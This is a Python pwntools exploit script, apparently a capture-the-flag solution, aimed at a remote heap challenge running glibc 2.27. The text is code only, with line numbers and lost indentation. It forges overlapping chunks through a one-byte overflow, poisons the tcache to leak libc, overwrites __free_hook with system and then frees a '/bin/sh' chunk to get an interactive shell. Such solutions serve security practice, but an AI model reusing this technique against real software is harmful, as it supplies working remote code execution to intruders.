1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
|
from pwn import *
context.log_level='debug'
context.terminal = ['tmux','splitw','-h']
r = remote("node4.buuoj.cn",27352)
libc = ELF("./libc-2.27.so")
def add(idx,size,content):
r.sendlineafter("4.show\n","1")
r.sendlineafter("index:\n",str(idx))
r.sendafter("size:\n",str(size))
r.recvuntil("gift: ")
heap_addr = r.recvuntil("\n")
r.sendafter("content:\n",content)
return heap_addr
def show(index):
r.sendlineafter("4.show\n","4")
r.sendlineafter("index:",str(index))
def delete(index):
r.sendlineafter("4.show\n","2")
r.sendlineafter("index:",str(index))
def edit(index,content):
r.sendlineafter("4.show\n","3")
r.sendlineafter("index:",str(index))
r.sendafter("content:\n",content)
key2_addr = 0x6022B8
for i in range(7):
add(i,0xf8,"a")
add(7,0xf8,'0')
add(8,0xf8,'1')
add(9,0xa8,'2')
add(10,0xf8,'3')
add(11,0xf8,'/bin/sh\x00')
for i in range(8):
delete(i)
payload = 'a'*0xa0+p64(0x2b0)
edit(9,payload)
delete(10)
for i in range(7):
add(i,0xf8,"a")
add(12,0xf8,'a')
add(13,0xf8,'5')
delete(13)
delete(8)
add(14,0xf8,p64(key2_addr))
add(15,0xf8,'6')
add(16,0xf8,p32(1)+p32(0x200))
show(12)
r.recvuntil("\n")
malloc_hook = u64(r.recvuntil("\n").strip("\n").ljust(8,"\x00"))-0x421-0x10
lbase = malloc_hook-libc.sym["__malloc_hook"]
free_hook = lbase+libc.sym["__free_hook"]
system_addr = lbase+libc.sym["system"]
log.success("libc_base: "+hex(lbase))
add(17,0xa8,'1')
delete(17)
delete(9)
add(18,0xa8,p64(free_hook))
add(19,0xa8,'junk')
add(20,0xa8,p64(system_addr))
delete(11)
r.interactive()
|
